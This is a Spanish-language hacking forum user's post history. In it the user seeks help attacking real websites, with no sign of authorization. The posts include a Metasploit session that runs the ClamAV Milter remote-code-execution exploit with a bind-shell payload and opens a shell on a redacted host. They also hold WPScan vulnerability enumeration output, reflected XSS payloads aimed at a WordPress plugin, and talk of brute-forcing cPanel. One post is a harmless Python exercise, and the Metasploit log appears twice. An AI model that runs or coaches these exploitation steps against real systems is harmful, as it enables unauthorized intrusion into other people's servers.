Si he probado con los demas payloads y me sigue dando el mismo error.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Dudas y pedidos generales / Re:MSF Sesion abierta, pero da error.
Febrero 16, 2014, 12:08:43 AM
Hola hermano, en primer lugar gracias por contestar.
Tienes razón, deberia haberme asegurado de que el servidor usa ClamAv. Pero no he encotrado informacion al respecto en google. Y una pregunta, ¿si abre sesión es porque es vulnerable?
O puede abrir sesión sin usar ClamAv, nose si me entiendes. Yo pensaba que como abre una sesión en msf era vulnerable, usaba ClamAv y que lo que fallaba era el payload que utilizaba. Por eso daba este error, Reason: Died from Errno::ECONNRESET.
Un Saludo.
Tienes razón, deberia haberme asegurado de que el servidor usa ClamAv. Pero no he encotrado informacion al respecto en google. Y una pregunta, ¿si abre sesión es porque es vulnerable?
O puede abrir sesión sin usar ClamAv, nose si me entiendes. Yo pensaba que como abre una sesión en msf era vulnerable, usaba ClamAv y que lo que fallaba era el payload que utilizaba. Por eso daba este error, Reason: Died from Errno::ECONNRESET.
Un Saludo.

#3
Dudas y pedidos generales / [SOLUCIONADO] MSF Sesion abierta, pero da error.
Febrero 15, 2014, 06:00:31 PM
He estado haciendo una auditoria a una web y viendo los puertos abiertos localice que tenia el puerto 25 (SMTP), busque un exploit para intentar explotarlo en msf:
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
msf > search smtp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/client/smtp/emailer normal Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan 2003-09-17 00:00:00 UTC normal Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange 2004-11-12 00:00:00 UTC normal MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer normal SMTP Simple Fuzzer
auxiliary/scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_version normal SMTP Banner Grabber
auxiliary/server/capture/smtp normal Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii normal VSploit Email PII
exploit/unix/smtp/clamav_milter_blackhole 2007-08-24 00:00:00 UTC excellent ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format 2010-12-07 00:00:00 UTC excellent Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin 2007-07-09 00:00:00 UTC manual SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex 2010-05-19 00:00:00 UTC great CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress 2009-08-28 00:00:00 UTC normal Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 00:00:00 UTC great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw 2003-12-29 00:00:00 UTC great MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 00:00:00 UTC good TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5 2007-08-18 00:00:00 UTC great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 00:00:00 UTC good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof 2011-10-31 00:00:00 UTC normal NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver 2005-07-11 00:00:00 UTC average SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1 2004-09-27 00:00:00 UTC average YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct 2004-04-13 00:00:00 UTC average Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook normal Windows Gather Microsoft Outlook Saved Password Extraction
Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.
msf > use exploit/unix/smtp/clamav_milter_blackhole
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST yes The target address
RPORT 25 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(clamav_milter_blackhole) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double reverse TCP SSL (telnet)
msf exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf exploit(clamav_milter_blackhole) > show options
Module options (exploit/unix/smtp/clamav_milter_blackhole):
Name Current Setting Required Description
---- --------------- -------- -----------
MAILFROM [email protected] yes FROM address of the e-mail
MAILTO nobody@localhost yes TO address of the e-mail
RHOST x.x.x.x yes The target address
RPORT 25 yes The target port
Payload options (cmd/unix/bind_ruby):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST x.x.x.x no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(clamav_milter_blackhole) > exploit
- Started bind handler
- Command shell session 1 opened (192.168.229.130:59441 -> x.x.x.x:4444) at 2014-02-15 14:44:08 -0500
daemon
[Aqui sale una codificacion extraña] - x.x.x.x - Command shell session 1 closed. Reason: Died from Errno::ECONNRESET
Creo que lo configuro todo bien pero me sigue dando este error.. He probado con diferentes payloads y con todo sucede lo mismo.
¿Alguien puede ayudarme?
#4
Talleres Underc0de / Re:Taller de Python #2
Agosto 08, 2013, 07:28:38 PM
Muy bueno el tuto. Lo he estudiado a fondo tanto éste como el anterior y e hecho este programita que comprueba múltiplos, para así comprobar que sabia utilizar las estructuras de control if, elif, else, for y while. Espero una tercera entrega para poder aprender más.
Código: python
Un Saludo, Krraskl13.
Datos = raw_input("Inserte usuario: ")
print "Bienvenido " + Datos
print "Inserte 'Comprobar' para comprobar si un numero es multiplo de otro."
print "Inserte 'Multiplos' para conocer los 10 primeros multiplos de un numero."
Menu = raw_input("Inserte la palabra que desee: ")
if Menu=="Comprobar":
Multiplo = input("Ingrese el numero para comprobar sus multiplos: ")
Numero = input("Ingrese un numero para comprobar si es multiplo de " + str(Multiplo) + ": ")
if Numero%Multiplo==0:
print "Su numero es multiplo de " + str(Multiplo)
else :
print "Su numero no es multiplo de " + str(Multiplo)
elif Menu =="Multiplos":
#Escribir primeros 10 multiplos
Numero = input("Inserte el numero del que desea conocer sus primeros 10 multiplos: ")
for i in range(11):
print Numero*i
else:
print "Usted ha escrito: " + Menu
while True:
Aux=raw_input("Inserte 'Salir':")
if Aux=="Salir":
print "Adios " + Datos
break
else :
print "Usted ha escrito: " + Aux
Un Saludo, Krraskl13.

#5
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 04:46:43 PMNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Haciendo un scanner? Wtf?! Scanner es el programa con el que haces SCANNING.
Y, me parece a mi, o tienes informaciones en Vega cuando el SCANNER encuentra una vulnerabilidad IntegerOverflow?
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Si haciendo un Scanner de vulnerabilidades con Vegas, y la informacion ofrecida por el programa no la entendia para explotarla ya me ha dado un buen empujon CalebBucker, con lo de explotacion a traves de SqlMap.
#7
Dudas y pedidos generales / Integer Overflow
Enero 25, 2013, 09:02:40 AM
Haciendo un scanner con Vegas de la distro Backtrack5 R3, a una web y me da 20 errores de Integer Overflow de riesgo alto. He buscado por google y por distintos foros, y solo encuentro vulnerabilidades de integer overflow en aplicaciones y eso pero nada de vulnerabilidades web.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.
Saludos, Krraskl13.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.
Saludos, Krraskl13.
#9
Dudas y pedidos generales / Re:Cross Site Scripting (XSS) HELP!
Enero 12, 2013, 02:32:58 PM
Espero estar haciendo algo mal.. Porque es la única vulnerabilidad que sale!!
Asi que no se que hacer..
Asi que no se que hacer..
#10
Dudas y pedidos generales / Re:Cross Site Scripting (XSS) HELP!
Enero 12, 2013, 11:42:37 AM
Tambien probe con el Live Http Headers.. Que se me olvido comentarlo, cargue la pagina http://www.*site*.com/wp-admin/admin-ajax.php en mozzilla y despues le di a repetir con el post:action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero recargaba la pagina y seguia igual..
Pero recargaba la pagina y seguia igual..
#11
Dudas y pedidos generales / Re:Cross Site Scripting (CSS) HELP!
Enero 12, 2013, 11:29:06 AMNo tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Primero que nada el Cross Site Scripting tiende a usar como acrónimo Xss no Css por otra parte como te podemos ayudar si no nos has proporcionado la URL.
Saludos,
Dedalo
Corregido!! Perdon por mi fallo.
Por otra parte queria decir que si he leido sobre XSS, solo que lo escribí mal y no me di cuenta.
El problema es que cuando abro la direccion que me indica el exploit http://www.*site*.com/wp-admin/admin-ajax.php me sale una pagina en blanco con un 0 arriba a la izquierda. Y ahi no hay ningun buscador ni ningun formulario para hacer XSS.
Entonces lo he probado en la URL de esta forma http://www.*site*.com/wp-admin/admin-ajax.php?action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero tampoco. Por eso he pedido ayuda.
#12
Dudas y pedidos generales / Re:Cross Site Scripting (CSS) HELP!
Enero 12, 2013, 09:41:45 AM
WPScan, mira esto es lo que me devuelve:
Código: text
root@bt:~/wpscan# ruby wpscan.rb --url http://www.*site*.com --enumerate vp
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v2.0r2593a2e
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.*site*.com/
| Started on Sat Jan 12 07:38:50 2013
[+] The WordPress theme in use is iblogpro v4.2.6
[!] The WordPress 'http://www.*site*.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.*site*.com/wp-includes/rss-functions.php'
[+] WordPress version 3.5 identified from meta generator
[!] We have identified 2 vulnerabilities from the version number :
| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner
| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 321 total plugins... 100% complete.
[+] We found 1 plugins:
| Name: codestyling-localization
| Location: http://www.*site*.com/wp-content/plugins/codestyling-localization/
| Directory listing enabled: Yes
| Readme: http://www.*site*.com/wp-content/plugins/codestyling-localization/readme.txt
|
| [!] Code Styling Localization <= 1.99.16 Cross Site Scripting
| * Reference: http://packetstormsecurity.org/files/112709/
[+] Finished at Sat Jan 12 07:39:39 2013
[+] Elapsed time: 00:00:48
#13
Dudas y pedidos generales / Cross Site Scripting (XSS) HELP!
Enero 11, 2013, 11:22:31 PM
Hola, me sale una vulnerabilidad en un WordPress del plugin WordPress CodeStyling Localization 1.99.16, y el escaner me devuelve este exploit:
Código: text
Pero no consigo lanzarlo.. Alguien me ayuda ??
http://packetstormsecurity.com/files/112709/
Pero no consigo lanzarlo.. Alguien me ayuda ??
#14
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 11, 2013, 08:27:10 PM
Acabo de actualizar el wpSCan y me ha dado dos vulnerabilidades por la version del WordPress 3.5, a ver si me podeis ayudar :
Código: text
Me he instalado el wpps.rb pero no consigo llegar a nada.
[!] We have identified 2 vulnerabilities from the version number :
| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner
| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
Me he instalado el wpps.rb pero no consigo llegar a nada.
#15
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 11, 2013, 01:14:53 PM
Alguna sugerencia ??
Brute force al Cpanel no queda otra no ??
Brute force al Cpanel no queda otra no ??
#16
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 10, 2013, 05:38:17 PM
Despues de leer unos tutoriales, ya encontre mi fallo --wp-content-dir, necesita ir acompañado de algun path como el --enumerate.
He probado --enumerate vp, ap y p pero no se ha encontrado ningun plugin.
Código: text
Sin embargo cuando hago la consulta:
Código: text
Me salen un monton de plugins, para explotar. Pero no se puede acceder a ninguno de ellos.. Y no consigo llevar a cabo ningun exploit.
He probado --enumerate vp, ap y p pero no se ha encontrado ningun plugin.
root@bt:~/wpscan# ruby wpscan.rb --url www.*site*.com -f --wp-content-dir --enumerate vp
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v2.0rcf102a0
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://www.*site*.com/
| Started on Thu Jan 10 15:21:18 2013
[!] The WordPress 'http://www.*site*.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.*site*.com/wp-includes/rss-functions.php'
[+] XML-RPC Interface available under http://www.*site*.com/xmlrpc.php
[+] WordPress version 3.5 identified from advanced fingerprinting
[+] Enumerating plugins from passive detection ...
No plugins found :(
[+] Finished at Thu Jan 10 15:21:31 2013
[+] Elapsed time: 00:00:13
Sin embargo cuando hago la consulta:
ruby wpscan.rb --url www.*site*.com -f --wp-content-dir custom-content --enumerate vp
Me salen un monton de plugins, para explotar. Pero no se puede acceder a ninguno de ellos.. Y no consigo llevar a cabo ningun exploit.
#17
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 09, 2013, 11:32:31 AM
Ahora me salta otro error con -f
Código: text
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v2.0rcf102a0
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[ERROR] The WordPress URL supplied 'http://www.*site*.com/' seems to be down.
Trace :
wpscan.rb:54:in `<main>'
#18
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 08:12:40 PM
Ya tengo la ultima version y me vuelve a dar el mismo error :
Código: text
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v2.0rcf102a0
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[ERROR] The remote website is up, but does not seem to be running WordPress.
Trace :
wpscan.rb:83:in `<main>'
#19
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 07:41:08 PM
Ya le pongo el pathname /wp-content/ pero sigue dando error :
Código: text
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
The remote host tried to redirect us to http://www.*site*.com/wp-content/
Do you want follow the redirection ? [y/n]
y
[ERROR] The remote website is up, but does not seem to be running WordPress.
Trace : ["wpscan.rb:79:in `<main>'"]
#20
Dudas y pedidos generales / Re:Explotar pagina montada sobre wordpress
Enero 08, 2013, 11:58:31 AM
Acabo de pasarle el wpscan y me sale esto..
Código: text
[ERROR] The wp_content_dir has not been found, please supply it with --wp-content-dir